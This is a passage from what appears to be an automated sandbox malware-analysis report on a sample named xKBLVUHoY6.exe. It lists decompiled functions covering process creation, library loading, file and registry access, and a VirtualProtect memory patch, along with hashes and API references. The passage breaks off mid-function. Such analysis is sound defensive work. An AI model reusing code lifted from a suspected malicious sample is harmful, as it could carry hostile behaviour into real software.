Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 32d568233c538a6e869ae6d2da9aa4b7db5af2625be0dadeebaf1e716edd1da1
Instruction ID: f1f7847c69b95e8b88bdf62be751073741875666d26e4aee14b76084b72d5d95
Opcode Fuzzy Hash: 32d568233c538a6e869ae6d2da9aa4b7db5af2625be0dadeebaf1e716edd1da1
Instruction Fuzzy Hash: E2116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4, struct HWND__* _a10) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a250;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a10 != 0) {
						 *0x42920c =  *0x42920c + _t12;
						SendMessageW(_a10, 0x402, MulDiv( *0x42920c, 0x7530,  *0x4291f4), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
Instruction ID: 40daf909c284af41af5c9cdf7f458e0296b91398e9c9917f7ae767538e8fd086
Opcode Fuzzy Hash: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
Instruction Fuzzy Hash: 1A01D131724220EBEB194B389D09B2A3698E710318F10867AF855F66F1E6788C129B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EFC
EnableWindow.USER32(00000000,00000000), ref: 00401F07

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 140fa6264d81b82be0f57579ab09ac984e5fc0a146ecb1030cf4c806b2c00349
Instruction ID: 5d3c5223d4adea09edd48fe2ddafa99b3fbee87e2958761c9001e4fb32d1ad87
Opcode Fuzzy Hash: 140fa6264d81b82be0f57579ab09ac984e5fc0a146ecb1030cf4c806b2c00349
Instruction Fuzzy Hash: C3E0D872908201CFE705EBA4EE485AE73F4EF40315710097FE401F11D1DBB54C00866D

Uniqueness

Uniqueness Score: -1.00%

Function 00405AEA Relevance: 3.0, APIs: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AEA(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426710->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426710,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405af3
0x00405b13
0x00405b1b
0x00405b20
0x00000000
0x00405b26
0x00405b2a

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,00000000,00000000), ref: 00405B13
CloseHandle.KERNEL32(?), ref: 00405B20

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
Instruction ID: 90cc6d476167cb297d6b140a5f1e3d8b94c2ff7c6bb70ea469832da4d223c92c
Opcode Fuzzy Hash: 0e81a11ecc4c6fe7d2bd14f7f4550c250266fb7a2a5fb983bdda8c5a8ca6adfb
Instruction Fuzzy Hash: F2E0BFB46002097FEB109B64ED45F7B77BCEB04608F414465BD54F6150DB74A9158E7C

Uniqueness

Uniqueness Score: -1.00%

Function 004068D4 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004068D4(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E00406864(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x004068dc
0x004068df
0x004068e6
0x004068ee
0x004068fa
0x00000000
0x00406901
0x004068f1
0x004068f8
0x00000000
0x00406909
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
GetProcAddress.KERNEL32(00000000,?), ref: 00406901

Part of subcall function 00406864: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
Part of subcall function 00406864: wsprintfW.USER32 ref: 004068B6
Part of subcall function 00406864: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction ID: b54d22b37b479e59566a9631c032e51b8c6cd741f5ea0e4d018af200ac078f8b
Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction Fuzzy Hash: 48E086335042109AE21197715D44C7B73A8AF89650307443EF947F2080DB38DC31A669

Uniqueness

Uniqueness Score: -1.00%

Function 00405FF7 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405FF7(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405ffb
0x00406008
0x0040601d
0x00406023

APIs

GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\xKBLVUHoY6.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405FD2 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405FD2(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405fd7
0x00405fdd
0x00405fe2
0x00405feb
0x00405feb
0x00405ff4

APIs

GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FEB

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: 846b50f6ec280e5947384c74444241e6b9796591039fc91e932c01759f2cc32f
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 2CD0C972504531ABC2102728EE0889BBB55EF642717054A35FAA5A22B0CB304C529E98

Uniqueness

Uniqueness Score: -1.00%

Function 00405AB5 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AB5(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405abb
0x00405ac3
0x00000000
0x00405ac9
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
GetLastError.KERNEL32 ref: 00405AC9

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 81e7360d8487983dd45b28c0c59a41c1d83062ba9acea414cf4290cf05fa9266
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: C3C04C30314601AED7505B609E48B177EA19B94741F1A85396146E41A4DA389455DD2D

Uniqueness

Uniqueness Score: -1.00%

Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004023B2(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402DA6(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
					_t13 = E00402DA6(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
					_t11 = E00402DA6(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x004023b2
0x004023b2
0x004023b4
0x004023b8
0x004023bb
0x004023c0
0x004023c5
0x004023ce
0x004023ce
0x004023d3
0x004023dc
0x004023dc
0x004023e9
0x004015b4
0x004015b6
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040607A Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040607A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x0040607e
0x0040608e
0x00406096
0x00000000
0x0040609d
0x00000000
0x0040609f

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034AC,00000000,00000000,00403303,000000FF,00000004,00000000,00000000,00000000), ref: 0040608E

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: c8e4d841af9964a9af1d27d101842a5e1860e0780d1899a5c61b78fe641b59a9
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: 84E08632140219ABCF10EE518C00EEB379CFF01390F054432F911E2140D638E92187A4

Uniqueness

Uniqueness Score: -1.00%

Function 004060A9 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060A9(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060ad
0x004060bd
0x004060c5
0x00000000
0x004060cc
0x00000000
0x004060ce

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060BD

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 36c6d552b97af02dd58307b05a598db1695570393df740455f8c701413f3969e
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: AFE0E632150169ABDF10DE559C00EEB775CEB05351F014476F955E3150DA31E87197A5

Uniqueness

Uniqueness Score: -1.00%

Function 6E552A7F Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x6e555048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x6e55505c, 4, 0x40, 0x6e55504c); // executed
					 *0x6e55505c = 0xc2;
					 *0x6e55504c = 0;
					 *0x6e555054 = 0;
					 *0x6e555068 = 0;
					 *0x6e555058 = 0;
					 *0x6e555050 = 0;
					 *0x6e555060 = 0;
					 *0x6e55505e = 0;
				}
				return 1;
			}

0x6e552a88
0x6e552a8d
0x6e552a9d
0x6e552aa5
0x6e552aac
0x6e552ab1
0x6e552ab6
0x6e552abb
0x6e552ac0
0x6e552ac5
0x6e552aca
0x6e552aca
0x6e552ad2

APIs

VirtualProtect.KERNELBASE(6E55505C,00000004,00000040,6E55504C), ref: 6E552A9D

Memory Dump Source

Source File: 00000000.00000002.1491224488.000000006E551000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E550000, based on PE: true

Associated: 00000000.00000002.1491166706.000000006E550000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491295904.000000006E554000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491349838.000000006E556000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e550000_xKBLVUHoY6.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b62a3eca25f301336661c209b28efe8d14961564b45f7ac63ff9e11ec0778e40
Instruction ID: 2044800574d6fa6ea7d64538db0f75e9e3528aa3df0daae5628a8ab2d4b098b0
Opcode Fuzzy Hash: b62a3eca25f301336661c209b28efe8d14961564b45f7ac63ff9e11ec0778e40
Instruction Fuzzy Hash: 70F0C2B0905B80DECBA1CF79884470A3FF0B70A324B16452BE18CDA361EB745458CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00406374 Relevance: 1.5, APIs: 1, Instructions: 19
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406374(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E004062F3(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x0040637e
0x00406385
0x00406398
0x00000000
0x00406398
0x00406389
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406402,?,00000000,?,?,Call,?), ref: 00406398

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction ID: 95f024e915835d806257714b27b18acfdec26fcf9bd71fa5ecdde53cd8054228
Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
Instruction Fuzzy Hash: 00D0123210030DBBDF11AF90DD01FAB3B1DAB08310F014436FE06A5091D776D530AB64

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
